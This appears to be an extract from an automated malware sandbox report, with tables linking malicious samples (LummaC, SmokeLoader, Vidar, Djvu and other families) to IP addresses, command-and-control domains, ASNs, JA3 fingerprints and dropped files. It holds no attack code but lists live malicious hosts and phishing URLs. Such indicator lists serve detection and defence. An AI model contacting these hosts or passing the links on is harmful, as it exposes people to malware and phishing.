                                                                                                                                                                                  6t0abj5L0W.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, SmokeLoader, Socks5SystemzBrowse
                                                                                                                                                                                    UUVupNLfBb.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, SmokeLoader, Socks5SystemzBrowse
                                                                                                                                                                                      FNzQAE7DvU.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, SmokeLoader, Socks5SystemzBrowse
                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars StealerBrowse
                                                                                                                                                                                          SecuriteInfo.com.Win32.CrypterX-gen.27433.20242.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                            NkvJGApqGf.exeGet hashmaliciousLummaC, Python Stealer, Amadey, Glupteba, LummaC Stealer, Mars Stealer, Monster StealerBrowse
                                                                                                                                                                                              81.94.159.197vHpxL6E2sQ.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                                                                                                                                                              • trad-einmyus.com/index.php
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                                                                                                                                                              • trad-einmyus.com/index.php
                                                                                                                                                                                              wn1gncGy2T.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                                                                                                                                                              • trad-einmyus.com/index.php
                                                                                                                                                                                              4p9nmGarFL.exeGet hashmaliciousRHADAMANTHYS, SmokeLoaderBrowse
                                                                                                                                                                                              • trad-einmyus.com/index.php
                                                                                                                                                                                              noDmpaxL0x.exeGet hashmaliciousBabuk, Djvu, Glupteba, SmokeLoader, Xehook StealerBrowse
                                                                                                                                                                                              • trad-einmyus.com/index.php
                                                                                                                                                                                              doTtQFWKly.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, Glupteba, SmokeLoader, Vidar, Xehook StealerBrowse
                                                                                                                                                                                              • trad-einmyus.com/index.php
                                                                                                                                                                                              file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, Glupteba, SmokeLoader, Vidar, Xehook StealerBrowse
                                                                                                                                                                                              • trad-einmyus.com/index.php
                                                                                                                                                                                              PADD8toZVX.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars StealerBrowse
                                                                                                                                                                                              • trad-einmyus.com/index.php
                                                                                                                                                                                              MT5Um6Ykrl.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars StealerBrowse
                                                                                                                                                                                              • trad-einmyus.com/index.php
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, Mars Stealer, PureLog StealerBrowse
                                                                                                                                                                                              • trad-einmyus.com/index.php

                                                                                                                                                                                              Domains

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              m2reg.ulm.ac.idvHpxL6E2sQ.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                                                                                                                                                              • 103.23.232.80
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                                                                                                                                                              • 103.23.232.80
                                                                                                                                                                                              wn1gncGy2T.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                                                                                                                                                              • 103.23.232.80
                                                                                                                                                                                              noDmpaxL0x.exeGet hashmaliciousBabuk, Djvu, Glupteba, SmokeLoader, Xehook StealerBrowse
                                                                                                                                                                                              • 103.23.232.80
                                                                                                                                                                                              PADD8toZVX.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars StealerBrowse
                                                                                                                                                                                              • 103.23.232.80
                                                                                                                                                                                              MT5Um6Ykrl.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars StealerBrowse
                                                                                                                                                                                              • 103.23.232.80
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, Mars Stealer, PureLog StealerBrowse
                                                                                                                                                                                              • 103.23.232.80
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars StealerBrowse
                                                                                                                                                                                              • 103.23.232.80
                                                                                                                                                                                              resergvearyinitiani.shopvHpxL6E2sQ.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                                                                                                                                                              • 172.67.217.100
                                                                                                                                                                                              Vjt694rffx.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                                                                                              • 172.67.217.100
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                                                                                                                                                              • 104.21.94.2
                                                                                                                                                                                              wn1gncGy2T.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                                                                                                                                                              • 104.21.94.2
                                                                                                                                                                                              PADD8toZVX.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars StealerBrowse
                                                                                                                                                                                              • 172.67.217.100
                                                                                                                                                                                              MT5Um6Ykrl.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars StealerBrowse
                                                                                                                                                                                              • 104.21.94.2
                                                                                                                                                                                              ak55ZgXKwt.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, SmokeLoader, Socks5SystemzBrowse
                                                                                                                                                                                              • 172.67.217.100
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, Mars Stealer, PureLog StealerBrowse
                                                                                                                                                                                              • 104.21.94.2
                                                                                                                                                                                              tZksysDKeT.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, SmokeLoader, Socks5SystemzBrowse
                                                                                                                                                                                              • 172.67.217.100
                                                                                                                                                                                              woM8Z8CFYx.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                              • 172.67.217.100
                                                                                                                                                                                              sajdfue.comvHpxL6E2sQ.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                                                                                                                                                              • 211.168.53.110
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                                                                                                                                                              • 196.22.53.110
                                                                                                                                                                                              wn1gncGy2T.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                                                                                                                                                              • 62.150.232.50
                                                                                                                                                                                              noDmpaxL0x.exeGet hashmaliciousBabuk, Djvu, Glupteba, SmokeLoader, Xehook StealerBrowse
                                                                                                                                                                                              • 187.199.102.130
                                                                                                                                                                                              doTtQFWKly.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, Glupteba, SmokeLoader, Vidar, Xehook StealerBrowse
                                                                                                                                                                                              • 176.29.154.25
                                                                                                                                                                                              file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, Glupteba, SmokeLoader, Vidar, Xehook StealerBrowse
                                                                                                                                                                                              • 210.182.29.70
                                                                                                                                                                                              PADD8toZVX.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars StealerBrowse
                                                                                                                                                                                              • 189.190.159.220
                                                                                                                                                                                              MT5Um6Ykrl.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars StealerBrowse
                                                                                                                                                                                              • 63.143.98.185
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, Mars Stealer, PureLog StealerBrowse
                                                                                                                                                                                              • 200.45.93.45
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars StealerBrowse
                                                                                                                                                                                              • 190.224.203.37
                                                                                                                                                                                              sdfjhuz.comvHpxL6E2sQ.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                                                                                                                                                              • 151.233.51.166
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                                                                                                                                                              • 220.125.3.190
                                                                                                                                                                                              wn1gncGy2T.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                                                                                                                                                              • 63.143.98.185
                                                                                                                                                                                              noDmpaxL0x.exeGet hashmaliciousBabuk, Djvu, Glupteba, SmokeLoader, Xehook StealerBrowse
                                                                                                                                                                                              • 201.229.203.107
                                                                                                                                                                                              doTtQFWKly.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, Glupteba, SmokeLoader, Vidar, Xehook StealerBrowse
                                                                                                                                                                                              • 109.98.58.98
                                                                                                                                                                                              file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, Glupteba, SmokeLoader, Vidar, Xehook StealerBrowse
                                                                                                                                                                                              • 211.181.24.133
                                                                                                                                                                                              PADD8toZVX.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars StealerBrowse
                                                                                                                                                                                              • 123.213.233.131
                                                                                                                                                                                              MT5Um6Ykrl.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars StealerBrowse
                                                                                                                                                                                              • 148.230.249.9
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, Mars Stealer, PureLog StealerBrowse
                                                                                                                                                                                              • 211.202.224.10
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars StealerBrowse
                                                                                                                                                                                              • 63.143.98.185

                                                                                                                                                                                              ASNs

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              WESTCALL-ASRUvHpxL6E2sQ.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                                                                                                                                                              • 81.94.159.197
                                                                                                                                                                                              2ZQkFRoMrY.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, SmokeLoader, XWorm, zgRATBrowse
                                                                                                                                                                                              • 81.94.159.197
                                                                                                                                                                                              SecuriteInfo.com.Win32.TrojanX-gen.1033.1898.exeGet hashmaliciousAmadey, Mars Stealer, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, VidarBrowse
                                                                                                                                                                                              • 81.94.159.197
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                                                                                                                                                              • 81.94.159.197
                                                                                                                                                                                              wn1gncGy2T.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                                                                                                                                                              • 81.94.159.197
                                                                                                                                                                                              4p9nmGarFL.exeGet hashmaliciousRHADAMANTHYS, SmokeLoaderBrowse
                                                                                                                                                                                              • 81.94.159.197
                                                                                                                                                                                              noDmpaxL0x.exeGet hashmaliciousBabuk, Djvu, Glupteba, SmokeLoader, Xehook StealerBrowse
                                                                                                                                                                                              • 81.94.159.197
                                                                                                                                                                                              doTtQFWKly.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, Glupteba, SmokeLoader, Vidar, Xehook StealerBrowse
                                                                                                                                                                                              • 81.94.159.197
                                                                                                                                                                                              file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, Glupteba, SmokeLoader, Vidar, Xehook StealerBrowse
                                                                                                                                                                                              • 81.94.159.197
                                                                                                                                                                                              PADD8toZVX.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars StealerBrowse
                                                                                                                                                                                              • 81.94.159.197
                                                                                                                                                                                              HETZNER-ASDEfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 78.46.229.36
                                                                                                                                                                                              JAJL2EYBPH.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                              • 138.201.79.103
                                                                                                                                                                                              https://mnrdtfqrcyfqiou.s3.amazonaws.com/mnrdtfqrcyfqiou.html#4HHHnO7279bGJq492fumheqtoju1686NCUIKVMPNMDQVMT689230/736882Y21#qgow23ahs76jjbq8j26ouc8n3ucpjfst25g85oeaei03mafty5n389rGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 49.12.134.254
                                                                                                                                                                                              cvdLNZXNPZ.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 188.42.90.189
                                                                                                                                                                                              VJy4TgKlVo.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 94.130.143.171
                                                                                                                                                                                              https://colourlyrics.com/fe/KtHc5ruvtRkZFoArrtthaJsvCmg3Rb7X4JToP666Ry87hz3e3rFuRJGAPKBcoBZjAZJZK4pouqXoieozb8x97ijrpxmdxNfsxaBCR2nGFdZnrhtCVLagarbeJ5bjm2rcgeCmZPnkCo2NqoSFB3o6MQGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 195.201.167.244
                                                                                                                                                                                              i1crvbOZAP.exeGet hashmaliciousAmadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                                                                                              • 78.46.229.36
                                                                                                                                                                                              yU3icg18lq.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 78.46.229.36
                                                                                                                                                                                              DHL AWB 4677349.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                              • 78.47.213.180
                                                                                                                                                                                              EcNghZJd5O.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 78.46.229.36
                                                                                                                                                                                              CLOUDFLARENETUShttp://pirnx.us.comGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                                                              • 104.17.2.184
                                                                                                                                                                                              892016_Past Invoice_03_26_2024_48118858_756483.wsfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.21.48.77
                                                                                                                                                                                              892016_Past Invoice_03_26_2024_48118858_756483.wsfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.21.48.77
                                                                                                                                                                                              892016_Past Invoice_03_26_2024_48118858_756483.wsfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.21.48.77
                                                                                                                                                                                              https://www.rewardgateway.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 104.18.192.125
                                                                                                                                                                                              Sldl84wxy8.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                                                                                                                                                              • 104.21.95.148
                                                                                                                                                                                              https://content.amac.us/?m=ff1Z8iQrULAL24m6HV3KXgLVd6tjSdDrf&r=https://www.lcrhtrk.com/LSK646/3M7TGPW/?sub1=4956Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.64.144.175
                                                                                                                                                                                              http://www.rewardgateway.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 104.18.79.253
                                                                                                                                                                                              https://www.rewardgateway.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 104.18.79.253
                                                                                                                                                                                              securedoc_20240328T081124.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.18.11.207
                                                                                                                                                                                              CLOUDFLARENETUShttp://pirnx.us.comGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                                                              • 104.17.2.184
                                                                                                                                                                                              892016_Past Invoice_03_26_2024_48118858_756483.wsfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.21.48.77
                                                                                                                                                                                              892016_Past Invoice_03_26_2024_48118858_756483.wsfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.21.48.77
                                                                                                                                                                                              892016_Past Invoice_03_26_2024_48118858_756483.wsfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.21.48.77
                                                                                                                                                                                              https://www.rewardgateway.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 104.18.192.125
                                                                                                                                                                                              Sldl84wxy8.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                                                                                                                                                              • 104.21.95.148
                                                                                                                                                                                              https://content.amac.us/?m=ff1Z8iQrULAL24m6HV3KXgLVd6tjSdDrf&r=https://www.lcrhtrk.com/LSK646/3M7TGPW/?sub1=4956Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.64.144.175
                                                                                                                                                                                              http://www.rewardgateway.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 104.18.79.253
                                                                                                                                                                                              https://www.rewardgateway.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 104.18.79.253
                                                                                                                                                                                              securedoc_20240328T081124.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.18.11.207
                                                                                                                                                                                              CLOUDFLARENETUShttp://pirnx.us.comGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                                                              • 104.17.2.184
                                                                                                                                                                                              892016_Past Invoice_03_26_2024_48118858_756483.wsfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.21.48.77
                                                                                                                                                                                              892016_Past Invoice_03_26_2024_48118858_756483.wsfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.21.48.77
                                                                                                                                                                                              892016_Past Invoice_03_26_2024_48118858_756483.wsfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.21.48.77
                                                                                                                                                                                              https://www.rewardgateway.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 104.18.192.125
                                                                                                                                                                                              Sldl84wxy8.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                                                                                                                                                              • 104.21.95.148
                                                                                                                                                                                              https://content.amac.us/?m=ff1Z8iQrULAL24m6HV3KXgLVd6tjSdDrf&r=https://www.lcrhtrk.com/LSK646/3M7TGPW/?sub1=4956Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.64.144.175
                                                                                                                                                                                              http://www.rewardgateway.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 104.18.79.253
                                                                                                                                                                                              https://www.rewardgateway.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 104.18.79.253
                                                                                                                                                                                              securedoc_20240328T081124.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.18.11.207

                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              a0e9f5d64349fb13191bc781f81f42e1892016_Past Invoice_03_26_2024_48118858_756483.wsfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.253.115.138
                                                                                                                                                                                              • 192.185.16.114
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              • 172.67.156.20
                                                                                                                                                                                              • 104.21.94.2
                                                                                                                                                                                              • 172.67.207.127
                                                                                                                                                                                              892016_Past Invoice_03_26_2024_48118858_756483.wsfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.253.115.138
                                                                                                                                                                                              • 192.185.16.114
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              • 172.67.156.20
                                                                                                                                                                                              • 104.21.94.2
                                                                                                                                                                                              • 172.67.207.127
                                                                                                                                                                                              SecuriteInfo.com.Trojan.GenericKD.71775751.3624.4925.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.253.115.138
                                                                                                                                                                                              • 192.185.16.114
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              • 172.67.156.20
                                                                                                                                                                                              • 104.21.94.2
                                                                                                                                                                                              • 172.67.207.127
                                                                                                                                                                                              SecuriteInfo.com.Trojan.GenericKD.71775751.3624.4925.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.253.115.138
                                                                                                                                                                                              • 192.185.16.114
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              • 172.67.156.20
                                                                                                                                                                                              • 104.21.94.2
                                                                                                                                                                                              • 172.67.207.127
                                                                                                                                                                                              https://www.attemplate.com/gcc/24f1e58b-b088-4195-ba46-839e73aec371/406eb232-0f42-45b3-8f82-5ddbf95d3c28/4526622a-5e47-4913-897d-b139c3f50e94/attachment?id=T3JlSlFGWnFzWFRVUk1mQzVwN1d5V3BvT0lIMGd1MmFSTncyMDRDRXRKY1dLWnk0bmZKanUwWkxaU0JRa1VvOGZhTkloMFNSY24vUTU3cFB2eGJmY090ZVc1ZUc0MHdldWRuVFdSWEtLem5UV3VXTlozS0kwTGpGTDNTT0d0SHAveERBQjJFUUNPTUhqWDY3MVJlZzhiSG14ZjVqMmdjNlVUMjh1NXpwazZLblFjeHdDQlBxblJwaVNKY1R6WUp6YnlhaHo5dTRpRFZUY2w2SGQwRW9oNzNXTFJ5MjdQN090UzNtWHIwZDVVK21OV095NHRLT0plZ29TT3EweVdZaDlhUW9lK2lmOWtpOUlmTFRYL3pDSVZzRCt2WEFBbjQyNVRQTDBoRE9IK1NXbmM3UndCdjk2dUg5QVF3MnRodGN3V2NjSCt1ZXZVbzR4VUt5dnEzcFhzOGRkRGUvYWROemJ4NDNHRkJLejRtU01ISmpOYVpEbi9GdUlJUFliMGQ1MHFBaHJCYnQzWWhMTExQcUtUU0RzQT09Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.253.115.138
                                                                                                                                                                                              • 192.185.16.114
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              • 172.67.156.20
                                                                                                                                                                                              • 104.21.94.2
                                                                                                                                                                                              • 172.67.207.127
                                                                                                                                                                                              midyear_statement.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                                              • 172.253.115.138
                                                                                                                                                                                              • 192.185.16.114
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              • 172.67.156.20
                                                                                                                                                                                              • 104.21.94.2
                                                                                                                                                                                              • 172.67.207.127
                                                                                                                                                                                              QJwM0vJ5mk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 172.253.115.138
                                                                                                                                                                                              • 192.185.16.114
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              • 172.67.156.20
                                                                                                                                                                                              • 104.21.94.2
                                                                                                                                                                                              • 172.67.207.127
                                                                                                                                                                                              mUY60MPRcJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 172.253.115.138
                                                                                                                                                                                              • 192.185.16.114
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              • 172.67.156.20
                                                                                                                                                                                              • 104.21.94.2
                                                                                                                                                                                              • 172.67.207.127
                                                                                                                                                                                              FindAll.xlaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.253.115.138
                                                                                                                                                                                              • 192.185.16.114
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              • 172.67.156.20
                                                                                                                                                                                              • 104.21.94.2
                                                                                                                                                                                              • 172.67.207.127
                                                                                                                                                                                              11111.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.253.115.138
                                                                                                                                                                                              • 192.185.16.114
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              • 172.67.156.20
                                                                                                                                                                                              • 104.21.94.2
                                                                                                                                                                                              • 172.67.207.127
                                                                                                                                                                                              51c64c77e60f3980eea90869b68c58a8file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 78.46.229.36
                                                                                                                                                                                              i1crvbOZAP.exeGet hashmaliciousAmadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                                                                                              • 78.46.229.36
                                                                                                                                                                                              yU3icg18lq.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 78.46.229.36
                                                                                                                                                                                              EcNghZJd5O.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 78.46.229.36
                                                                                                                                                                                              Rechnung.pdf.lnkGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 78.46.229.36
                                                                                                                                                                                              Esp.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 78.46.229.36
                                                                                                                                                                                              file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                                                                                                                                              • 78.46.229.36
                                                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 78.46.229.36
                                                                                                                                                                                              vHpxL6E2sQ.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                                                                                                                                                              • 78.46.229.36
                                                                                                                                                                                              032JvHA9s7.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 78.46.229.36
                                                                                                                                                                                              37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 104.105.90.131
                                                                                                                                                                                              • 104.21.65.24
                                                                                                                                                                                              SecuriteInfo.com.Win32.TrojanX-gen.30150.14087.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.105.90.131
                                                                                                                                                                                              • 104.21.65.24
                                                                                                                                                                                              QJwM0vJ5mk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 104.105.90.131
                                                                                                                                                                                              • 104.21.65.24
                                                                                                                                                                                              JUSTIFICANTE DE PAGO S.SOCIAL (1)pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                              • 104.105.90.131
                                                                                                                                                                                              • 104.21.65.24
                                                                                                                                                                                              JUSTIFICANTE DE PAGO S.SOCIAL (1)pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                              • 104.105.90.131
                                                                                                                                                                                              • 104.21.65.24
                                                                                                                                                                                              SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeGet hashmaliciousClipboard Hijacker, XWorm, XmrigBrowse
                                                                                                                                                                                              • 104.105.90.131
                                                                                                                                                                                              • 104.21.65.24
                                                                                                                                                                                              i1crvbOZAP.exeGet hashmaliciousAmadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                                                                                              • 104.105.90.131
                                                                                                                                                                                              • 104.21.65.24
                                                                                                                                                                                              yU3icg18lq.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 104.105.90.131
                                                                                                                                                                                              • 104.21.65.24
                                                                                                                                                                                              RFQ20240327_Lista comercial_pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                              • 104.105.90.131
                                                                                                                                                                                              • 104.21.65.24
                                                                                                                                                                                              Richiesta di preventivo_RFQ03272024_pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                              • 104.105.90.131
                                                                                                                                                                                              • 104.21.65.24

                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              C:\ProgramData\freebl3.dllfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                i1crvbOZAP.exeGet hashmaliciousAmadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                  yU3icg18lq.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    EcNghZJd5O.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                      PIa51EkBL7.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                        G2KdVscPB4.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                          ofrAxT2J4j.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
